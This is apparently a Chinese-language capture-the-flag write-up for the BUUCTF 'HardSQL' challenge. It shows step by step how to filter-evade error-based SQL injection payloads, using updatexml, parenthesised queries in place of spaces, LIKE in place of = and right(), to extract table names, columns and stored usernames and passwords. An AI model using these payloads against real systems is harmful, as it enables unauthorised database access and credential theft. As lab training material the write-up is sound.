极客大挑战2019Hardsql

极客大挑战2019Hardsql

测试点：BUUCTF

目标：sql注入

首先创建靶机，进入页面，分别输入username和password

1’or 1=1

123进行测试返回如下页面

于是猜想这里应该过滤了空格或者是=，（之前尝试的盲注不合理）

于是我们输入payload:fumo‘ #进行尝试是否对空格进行过滤，发现这里确实是过滤了空格

对于空格的绕过我们可以采用/**/和（）的方式（对于任何一个子查询并且给出值得语句我们都可以用（）来进行包裹从而避免两边得空格）

尝试后发现确实是过滤了空格。在看了大佬得WP之后，发现这里考察的是一个报错注入的类型。

那我们首先尝试updatexml，构造payload：fumo’or(updatexml(1,‘~’,2))#返回正确的页面

说明updatexml是行得通的，既然这样后面的思路就清晰了，先查数据库

构造fumo’or(updatexml(1,concat(0x7e,database(),ox7e),2))#

concat用于拼接字符串，从而达成报错的效果

成功返回了数据库，接下来查表名，构造payload如下

fumo’or(updatexml(1,concat(0x7e,(select(table_name)from(information_schema.tables)where(table_schema)like(‘geek’)),0x7e),1))#

成功查询出表名，接着是列，构造payload如下:

fumo’or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like(‘H4rDsq1’)),0x7e),1))#

拿下列明，最后一步查数据，构造payload如下：

fumo’or(updatexml(1,concat(0x7e,(select(group_concat(username,‘~’,password))from(H4rDsq1)),0x7e),1))#

拿到前一半flag

继续构造payload拿后一半，构造如下：

fumo’or(updatexml(1,concat(0x7e,(select(right(password,20))from(H4rDsq1)),0x7e),1))#

拿到后一半flag，进行拼接后提交；

涉及到的知识内容：

sql中绕过空格的操作（确定屏蔽字符可以上fuzz进行黑盒测试也行，不过空格还是要是手测）

=被过滤可以用like来绕过

报错注入的基本语法

以及在substring和mid被过滤时可以用right和left来绕过；

参考文章：大佬写的WP

如有错误还指正，一定改（